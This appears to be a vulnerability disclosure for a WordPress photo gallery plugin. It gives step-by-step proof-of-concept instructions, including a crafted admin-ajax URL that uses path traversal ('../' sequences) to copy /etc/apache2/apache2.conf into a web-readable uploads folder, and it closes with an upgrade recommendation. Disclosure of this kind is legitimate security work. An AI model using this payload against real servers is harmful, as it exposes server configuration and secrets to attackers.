The plugin contains a file manager component which allows broad access to the filesystem including deleting files, uploading files, and moving files. In this proof-of-concept we’ll be using path traversal to copy an Apache configuration file into a web-readable directory in order to allow the attacker to read secrets.
Proof of concept
- Visit: http://localhost/wp-admin/admin.php?page=galleries_bwg
- Click “Add New”
- Open the browser’s dev tools
- Click “Add Images”
- Find the request to a URL starting with “/wp-admin/admin-ajax.php?action=addImages&”
- Look for the bwg_nonce parameter in the URL and make a note of the value
- Visit this URL, making sure to replace NONCE_VALUE with the nonce you found: http://localhost/wp-admin/admin-ajax.php?action=addImages&bwg_nonce=NONCE_VALUE&callback=bwg_add_image&task=rename_item&file_names=../../../../../../etc/apache2/apache2.conf&file_new_name=apacheconfigfile
- To access the file, visit: http://localhost/wp-content/uploads/photo-gallery/apacheconfigfile.conf
Note that the number of “../”s you need to use will vary by server configuration, the file “/etc/apache2/apache2.conf” will not be available in all configurations, and some servers may be configured to block requests to .conf files in wp-content/uploads.
If the www user has write access to /etc this could break Apache. But in most cases they will not, so PHP’s rename() function will merely copy the file instead of moving it.
Upgrade to version 1.3.34 or later.